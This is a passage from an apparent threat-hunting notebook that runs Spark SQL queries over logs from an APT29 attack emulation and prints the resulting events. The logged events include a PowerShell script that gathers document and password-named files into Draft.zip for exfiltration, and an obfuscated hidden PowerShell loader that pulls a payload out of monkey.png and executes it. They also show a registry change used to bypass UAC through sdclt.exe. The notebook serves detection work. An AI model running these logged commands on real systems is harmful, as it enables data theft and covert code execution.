    AND LOWER(Image) LIKE '%powershell.exe'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:56:14.894
ProcessGuid: {47ab858c-e14e-5eac-ac03-000000000400}
ProcessId: 5944
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e144-5eac-ab03-000000000400}
ParentProcessId: 2772
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:57:15.946
ProcessGuid: {47ab858c-e18b-5eac-b103-000000000400}
ProcessId: 6868
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ParentProcessId: 3480
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 
-RECORD 2----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:59:04.124
ProcessGuid: {47ab858c-e1f8-5eac-bc03-000000000400}
ProcessId: 3832
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
ParentProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ParentProcessId: 3480
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe" 

Query ID:43B46661-3407-4302-BA8C-EE772C677DCB

df = spark.sql(
'''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
        AND LOWER(ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
        AND LOWER(NewProcessName) LIKE '%cmd.exe'
) b
ON a.ProcessId = b.NewProcessId
WHERE LOWER(Channel) = "security"
    AND EventID = 4688
    AND LOWER(NewProcessName) LIKE '%powershell.exe'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1738
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0xad4
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1ad4
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0xd98
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 2----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xef8
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0xd98
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.  

2.A.1. File and Directory Discovery

Procedure: Searched filesystem for document and media files using PowerShell

Criteria: powershell.exe executing (Get-)ChildItem

Detection Type:Telemetry(Correlated)

Query ID:10C87900-CC2F-4EE1-A2F2-1832A761B050

df = spark.sql(
'''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.ParentProcessGuid, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT ParentProcessGuid, ProcessGuid, ProcessId
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
      ) d
  ON c.ExecutionProcessID = d.ProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.ProcessGuid = b.ParentProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND LOWER(a.ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

Query ID:26F6963D-00D5-466A-B4BA-59DA30892B26

df = spark.sql(
'''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.NewProcessId, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT split(NewProcessId, '0x')[1] as NewProcessId, ProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
      ) d
  ON hex(c.ExecutionProcessID) = d.NewProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.NewProcessId = b.ProcessId
WHERE LOWER(a.Channel) = "security"
          AND a.EventID = 4688
          AND LOWER(a.ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

2.A.2. Automated Collection

Procedure: Scripted search of filesystem for document and media files using PowerShell

Criteria: powershell.exe executing (Get-)ChildItem

Detection Type:Telemetry(Correlated)

Query ID:F96EA21C-1EB4-4988-8F98-BD018717EE2D

df = spark.sql(
'''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.ParentProcessGuid, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT ParentProcessGuid, ProcessGuid, ProcessId
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
      ) d
  ON c.ExecutionProcessID = d.ProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.ProcessGuid = b.ParentProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND LOWER(a.ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

Query ID:EAD989D4-8886-46DC-BC8C-780C10760E93

df = spark.sql(
'''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.NewProcessId, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT split(NewProcessId, '0x')[1] as NewProcessId, ProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
      ) d
  ON hex(c.ExecutionProcessID) = d.NewProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%childitem%"
) b
ON a.NewProcessId = b.ProcessId
WHERE LOWER(a.Channel) = "security"
          AND a.EventID = 4688
          AND LOWER(a.ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

2.A.3. Data from Local System

Procedure: Recursively collected files found in C:\Users\Pam\ using PowerShell

Criteria: powershell.exe reading files in C:\Users\Pam\

Detection Type:None(None)

2.A.4. Data Compressed

Procedure: Compressed and stored files into ZIP (Draft.zip) using PowerShell

Criteria: powershell.exe executing Compress-Archive

Detection Type:Telemetry(Correlated)

Query ID:6CDEBEBF-387F-4A40-A4E8-8D4DF3A8F897

df = spark.sql(
'''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.ParentProcessGuid, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT ParentProcessGuid, ProcessGuid, ProcessId
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
      ) d
  ON c.ExecutionProcessID = d.ProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%compress-archive%"
) b
ON a.ProcessGuid = b.ParentProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND LOWER(a.ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

Query ID:621F8EE7-E9D8-417C-9FE5-5A0D89C3736A

df = spark.sql(
'''
SELECT b.ScriptBlockText
FROM apt29Host a
INNER JOIN (
  SELECT d.NewProcessId, d.ProcessId, c.ScriptBlockText
  FROM apt29Host c
  INNER JOIN (
      SELECT split(NewProcessId, '0x')[1] as NewProcessId, ProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
      ) d
  ON hex(c.ExecutionProcessID) = d.NewProcessId
  WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
          AND c.EventID = 4104
          AND LOWER(c.ScriptBlockText) LIKE "%compress-archive%"
) b
ON a.NewProcessId = b.ProcessId
WHERE LOWER(a.Channel) = "security"
          AND a.EventID = 4688
          AND LOWER(a.ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ScriptBlockText | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 

2.A.5. Data Staged

Procedure: Staged files for exfiltration into ZIP (Draft.zip) using PowerShell

Criteria: powershell.exe creating the file draft.zip

Detection Type:Telemetry(Correlated)

Query ID:76154CEC-1E01-4D3A-B9ED-C78978597C2B

df = spark.sql(
'''
SELECT TargetFilename
FROM apt29Host a
INNER JOIN (
    SELECT d.ProcessGuid, d.ProcessId
    FROM apt29Host c
    INNER JOIN (
        SELECT ProcessGuid, ProcessId
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
        ) d
    ON c.ExecutionProcessID = d.ProcessId
    WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
            AND c.EventID = 4104
            AND LOWER(c.ScriptBlockText) LIKE "%compress-archive%"
) b
ON a.ProcessGuid = b.ProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
            AND a.EventID = 11
            AND LOWER(a.TargetFilename) LIKE "%zip"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------
 TargetFilename | C:\Users\pbeesly\AppData\Roaming\Draft.Zip   
-RECORD 1------------------------------------------------------
 TargetFilename | C:\Users\pbeesly\AppData\Roaming\working.zip 

2.B.1. Exfiltration Over Command and Control Channel

Procedure: Read and downloaded ZIP (Draft.zip) over C2 channel (192.168.0.5 over TCP port 1234)

Criteria: The rcs.3aka3.doc process reading the file draft.zip while connected to the C2 channel

Detection Type:None(None)

3.A.1. Remote File Copy

Procedure: Dropped stage 2 payload (monkey.png) to disk

Criteria: The rcs.3aka3.doc process creating the file monkey.png

Detection Type:Telemetry(Correlated)

Query ID:64249901-ADF8-4E5D-8BB4-70540A45E26C

df = spark.sql(
'''
SELECT b.Message
FROM apt29Host a
INNER JOIN (
    SELECT ProcessGuid, Message
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 11
        AND LOWER(TargetFilename) LIKE '%monkey.png'
) b
ON a.ProcessGuid = b.ProcessGuid
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
  AND a.EventID = 1
  AND LOWER(a.Image) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | File created:
RuleName: -
UtcTime: 2020-05-02 02:57:00.933
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
TargetFilename: C:\Users\pbeesly\Downloads\monkey.png
CreationUtcTime: 2020-05-02 02:57:00.933 

3.A.2. Obfuscated Files or Information

Procedure: Embedded PowerShell payload in monkey.png using steganography

Criteria: Evidence that a PowerShell payload was within monkey.png

Detection Type:Telemetry(None)

Query ID:0F10E1D1-EDF8-4B9F-B879-3651598D528A

df = spark.sql(
'''
SELECT d.Image, d.CommandLine, c.ScriptBlockText
FROM apt29Host c
INNER JOIN (
    SELECT ParentProcessGuid, ProcessGuid, ProcessId, ParentImage, Image, ParentCommandLine, CommandLine
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
    ) d
ON c.ExecutionProcessID = d.ProcessId
WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND c.EventID = 4104
    AND LOWER(c.ScriptBlockText) LIKE "%monkey.png%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Image           | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                                                                                                                                                                                                                                                                                                                                                                     
 CommandLine     | "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 
 ScriptBlockText | sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))                                                               

Query ID:94F9B4F2-1C52-4A47-BF47-C786513A05AA

df = spark.sql(
'''
SELECT d.NewProcessName, d.CommandLine, c.ScriptBlockText
FROM apt29Host c
INNER JOIN (
    SELECT NewProcessName, CommandLine, split(NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host
    WHERE LOWER(Channel) = "security"
        AND EventID = 4688
    ) d
ON LOWER(hex(c.ExecutionProcessID)) = d.NewProcessId
WHERE c.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND c.EventID = 4104
    AND LOWER(c.ScriptBlockText) LIKE "%monkey.png%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 NewProcessName  | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                                                                                                                                                                                                                                                                                                                                                                     
 CommandLine     | "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" 
 ScriptBlockText | sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))                                                               

3.B.1. Component Object Model Hijacking

Procedure: Modified the Registry to enable COM hijacking of sdclt.exe using PowerShell

Criteria: Addition of the DelegateExecute ​subkey in ​HKCU\Software\Classes\Folder\shell\open\​​command​​

Detection Type:Telemetry(None)

Query ID:04EB334D-A304-40D9-B177-0BB6E95FC23E

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 13
    AND LOWER(TargetObject) RLIKE '.*\\\\\\\\folder\\\\\\\\shell\\\\\\\\open\\\\\\\\command\\\\\\\delegateexecute.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 02:58:30.649
ProcessGuid: {47ab858c-e18b-5eac-b103-000000000400}
ProcessId: 6868
Image: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107_Classes\Folder\shell\open\command\DelegateExecute
Details: (Empty) 

3.B.2. Bypass User Account Control

Procedure: Executed elevated PowerShell payload

Criteria: High integrity powershell.exe spawning from control.exe​​ (spawned from sdclt.exe)

Detection Type:Technique(None)

Query ID:7a4a8c7e-4238-4db3-a90d-34e9f3c6e60f

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(ParentImage) LIKE "%sdclt.exe%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:58:43.212
ProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400}
ProcessId: 4892
Image: C:\Windows\System32\control.exe
